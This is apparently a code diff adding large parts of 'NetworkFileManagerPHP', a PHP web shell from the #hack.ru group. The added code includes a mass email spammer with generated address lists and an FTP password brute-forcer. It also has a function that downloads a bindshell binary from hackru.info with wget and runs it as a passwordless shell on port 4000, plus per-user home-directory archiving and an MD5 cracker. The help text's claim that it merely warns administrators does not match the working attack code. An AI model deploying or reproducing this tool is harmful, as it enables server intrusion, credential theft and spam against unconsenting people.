+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>email generator:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;This spammer is splited in two parts: <br>
+ &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br>
+ &nbsp;<b>2.</b> Type spam settings here</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button>
+</td></tr>
+
+ </form></table>";
+// letters
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// letters
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// digits
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// common
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "ïóñòî";
+exit;
+}
+$file="email.txt";
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " File not found <b>\"".$address."\"</b> !<br>";
+  }
+
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  Ñãåíåğåííî âñåãî <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+	
+if (!isset($action)){
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='file' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Generate' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr>
+</table>";
+
+
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "something goes wrong, check your settings";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Unable to open  <b>\"".$address."\"</b> for read...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "unable to find file \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+
+#if ($file) {
+#	$content = fread(fopen($file,"r"),filesize($file));
+#		$content = chunk_split(base64_encode($content));
+#		$name = basename($file);
+#   } else {
+#   $content ='';
+#   }
+      $boundary = uniqid("NextPart_");
+
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	#  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent ";
+
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+              echo "";
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Unable to close  <b>\"".$address."\"</b> file!<br></td></tr> </table>";    }
+  } else {
+    echo "unable to read file  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Status: ".$counter." messages were sent.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>";
+
+}
+}
+
+
+# help
+
+function help() {
+
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br>
+
+There were added some commands to NFM, from scripts kind of itself. They are:<br>
+
+- Using aliases (<b>Rush</b>)<br>
+
+- FTP bruteforce (<b>TerraByte<b/>)<br>
+
+- Translated to english by (<b>revers<b/>)<br>
+
+- Added some sysinfo commands by (<b>revers<b/>)<br>
+
+- All the rest code belongs to me (<b>xoce<b/>)<br>
+
+- Thanks for testing goes to all #hack.ru channel<br><br>
+
+<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br>
+
+<b>How can you find us:</b><br>
+
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+
+See you round at network!!!<br></td></tr></table><br>";
+
+}
+
+
+
+
+
+function exploits($dir) {
+
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+
+if (!isset($status)) upload_exploits();
+
+
+
+else
+
+{
+
+
+
+$data = implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+fputs($fp, $data);
+
+$ok = fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+print "".exec("chmod 777 $public[1]")."";
+
+print "".exec("chmod 777 $public[2]")."";
+
+print "".exec("chmod 777 $public[3]")."";
+
+print "".exec("chmod 777 $private[1]")."";
+
+print "".exec("chmod 777 $private[2]")."";
+
+print "".exec("chmod 777 $private[3]")."";
+
+print "".exec("chmod 777 $private[4]")."";
+
+print "".exec("chmod 777 $private[5]")."";
+
+print "".exec("chmod 777 $private[6]")."";
+
+print "".exec("chmod 777 $private[7]")."";
+
+print "".exec("chmod 777 $private[8]")."";
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "Some errors occured.";
+
+}
+
+}
+
+}
+
+
+
+
+
+# FTP-bruteforce
+
+function ftp() {
+
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+
+ ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";
+
+
+
+ $fpip = @fopen ($filename, "r");
+
+ if ($fpip) {
+
+  while (!feof ($fpip)) {
+
+   $buf = fgets($fpip, 100);
+
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+   $conn_id=ftp_connect($ftp_server);
+
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+
+
+
+   $f=@fopen($HTTP_HOST,"a+");
+
+   fputs($f,"$g[1]:$g[1]\n");
+
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+
+
+
+   ftp_close($conn_id);
+
+   fclose($f);
+
+   } else {
+
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+function tar() {
+
+ global $action, $filename;
+
+ set_time_limit(0);
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br>
+
+<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br>
+
+<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr>
+
+</table><br>";
+
+
+
+$http_public="/public_html/";
+
+$fpip = @fopen ($filename, "r");
+
+if ($fpip) {
+
+ while (!feof ($fpip)) {
+
+  $buf = fgets($fpip, 100);
+
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+  $name=$g[1];
+
+  echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<form method='get' action='$PHP_SELF' >
+
+<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr>
+
+<tr>
+
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+
+<td valign=top><input type=submit value='GO' class=button1 $style_button></td>
+
+</tr></form></table>";
+
+  }
+
+ }
+
+}
+
+
+
+# bindshell
+
+function bash() {
+
+ global $action, $port_bind, $pass_key;
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr>
+
+</table><br>";
+
+
+
+echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>";
+
+
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>";
+
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>";
+
+echo"</table>";
+
+
+
+ }
+
+
+
+function crypte() {
+
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr>
+
+</table>";
+
+
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+
+
+ }
+
+
+
+function decrypte() {
+
+ global $action,$pass_de,$chars_de,$dat,$date;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr>
+
+</table>";
+
+
+
+if($chars_de==""){$chars_de="";}
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Data decrypter:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td>
+
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+
+  <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font>
+
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:¹.,&quot;')>[Symvols]</a><br><br>
+
+<font color=red><b><u>RUS:</u></b></font>
+
+<a class=menu href=javascript:ins('àáâãäå¸æçèéêëìíîïğñòóôõö÷øùúûüışÿ')>[à-ÿ]</a>
+
+<a class=menu href=javascript:ins('ÀÁÂÃÄŨÆÇÈÉÊËÌÍÎÏĞÑÒÓÔÕÖ×ØÙÚÛÜİŞß')>[À-ß]</a>
+
+</td></tr>
+
+<tr><td align=center width=400>
+
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+if($_POST[pass_de]){
+
+$pass_de=htmlspecialchars($pass_de);
+
+$pass_de=stripslashes($pass_de);
+
+$dat=date("H:i:s");
+
+$date=date("d:m:Y");
+
+
+
+crack_md5();
+
+}
+
+}
+
+
+
+function crack_md5() {
+
+global $chars_de;
+
+$chars=$_POST[chars];
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+$chars_de=str_replace("<",chr(60),$chars_de);
+
+$chars_de=str_replace(">",chr(62),$chars_de);
+
+$c=strlen($chars_de);
+
+for ($next = 0; $next <= 31; $next++) {
+
+for ($i1 = 0; $i1 <= $c; $i1++) {
+
+$word[1] = $chars_de{$i1};
+
+for ($i2 = 0; $i2 <= $c; $i2++) {
+
+$word[2] = $chars_de{$i2};
+
+if ($next <= 2) {
+
+result(implode($word));
+
+}else {
+
+for ($i3 = 0; $i3 <= $c; $i3++) {
+
+$word[3] = $chars_de{$i3};
+
+if ($next <= 3) {
+
+result(implode($word));
+
+}else {
+
+for ($i4 = 0; $i4 <= $c; $i4++) {
+
+$word[4] = $chars_de{$i4};
+
+if ($next <= 4) {
+
+result(implode($word));
+
+}else {
+
+for ($i5 = 0; $i5 <= $c; $i5++) {
+
+$word[5] = $chars_de{$i5};
+
+if ($next <= 5) {
+
+result(implode($word));
+
+}else {
+
+for ($i6 = 0; $i6 <= $c; $i6++) {
+
+$word[6] = $chars_de{$i6};
+
+if ($next <= 6) {
+
+result(implode($word));
+
+}else {
+
+for ($i7 = 0; $i7 <= $c; $i7++) {
+
+$word[7] = $chars_de{$i7};
+
+if ($next <= 7) {
+
+result(implode($word));
+
+}else {
+
+for ($i8 = 0; $i8 <= $c; $i8++) {
+
+$word[8] = $chars_de{$i8};
+
+if ($next <= 8) {
+
+result(implode($word));
+
+}else {
+
+for ($i9 = 0; $i9 <= $c; $i9++) {
+
+$word[9] = $chars_de{$i9};
+
+if ($next <= 9) {
+
+result(implode($word));
+
+}else {
+
+for ($i10 = 0; $i10 <= $c; $i10++) {
+
+$word[10] = $chars_de{$i10};
+
+if ($next <= 10) {
